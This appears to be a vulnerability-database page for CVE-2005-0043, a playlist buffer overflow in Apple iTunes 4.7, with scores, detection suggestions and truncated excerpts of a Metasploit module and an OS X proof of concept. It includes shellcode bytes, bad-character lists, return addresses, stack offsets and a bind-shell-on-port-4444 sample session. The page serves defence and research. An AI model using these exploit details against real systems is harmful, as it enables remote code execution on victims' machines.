CVE-2005-0043
published 2005-05-02CVE-2005-0043: Buffer overflow in Apple iTunes 4.7 allows remote attackers to execute arbitrary code via a long URL in (1) .m3u or (2) .pls playlist files.
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
69.01%
99.3th percentile
Buffer overflow in Apple iTunes 4.7 allows remote attackers to execute arbitrary code via a long URL in (1) .m3u or (2) .pls playlist files.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | itunes | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee
- →Detect PLS playlist files delivered over HTTP where the File1= field contains an abnormally long URL (>1598 bytes), indicative of the buffer overflow trigger. ↗
- →Flag HTTP responses with Content-Type text/plain serving .pls files that contain a [playlist] header followed by a NumberOfEntries field and an oversized File1=http:// URL. ↗
- →Monitor iTunes process for network connections to port 4444 immediately after opening a .pls file, which may indicate successful bindshell exploitation on macOS. ↗
- →Payload bad characters for this exploit are: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 — shellcode in .pls URLs will avoid these bytes, which can help tune detection signatures. ↗
- →Detect NOP sleds of ~2545 bytes prepended to shellcode within a URL embedded in a .pls playlist file. ↗
- →The OS X PoC shellcode fills the buffer with \x60 bytes as padding; scanning .pls file content for long runs of \x60 bytes followed by shellcode is a viable detection approach. ↗
- ·The Metasploit module requires the URIPATH to be set with a .pls extension for the exploit to function; without this, iTunes will not parse the file as a playlist. ↗
- ·The Windows return addresses are version-specific: 0x75033083 targets Windows 2000 Pro SP4 and 0x77dc2063 targets Windows XP Pro SP2; using the wrong target will cause a crash rather than code execution. ↗
- ·The OS X PoC targets iTunes on OS X 10.3.7 specifically and uses a hardcoded stack offset of 0x3DA8; this offset may need adjustment on other builds. ↗
- ·The vulnerable iTunes version is specifically build 4.7.0.42; other builds may not be exploitable with these exact offsets. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0043 Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
---
##
# $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Apple ITunes 4.7 Playlist Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Apple ITunes 4.7
build 4.7.0.42. By creating a URL link to a malicious PLS
file, a remote attacker could overflow a buffer and execute
arbitrary code. When using this module, be sure to set the
URIPATH with an extension of '.pls'.
},
'License' => MSF_LICE
Exploit-DB
Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb·2005-01-16
CVE-2005-0043 Apple iTunes - Playlist Parsing Local Buffer Overflow
Apple iTunes - Playlist Parsing Local Buffer Overflow
---
/*
* PoC for iTunes on OS X 10.3.7
* -( [email protected] )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( [email protected] )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include
#include
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
Metasploit
Apple ITunes 4.7 Playlist Buffer Overflow
metasploit
Apple ITunes 4.7 Playlist Buffer Overflow
Apple ITunes 4.7 Playlist Buffer Overflow
This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.htmlhttp://secunia.com/advisories/13804http://securitytracker.com/id?1012839http://www.idefense.com/application/poi/display?id=180&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/377368http://www.osvdb.org/12833http://www.securityfocus.com/bid/12238https://exchange.xforce.ibmcloud.com/vulnerabilities/18851http://lists.apple.com/archives/security-announce/2005/Jan/msg00000.htmlhttp://secunia.com/advisories/13804http://securitytracker.com/id?1012839http://www.idefense.com/application/poi/display?id=180&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/377368http://www.osvdb.org/12833http://www.securityfocus.com/bid/12238https://exchange.xforce.ibmcloud.com/vulnerabilities/18851
2005-05-02
Published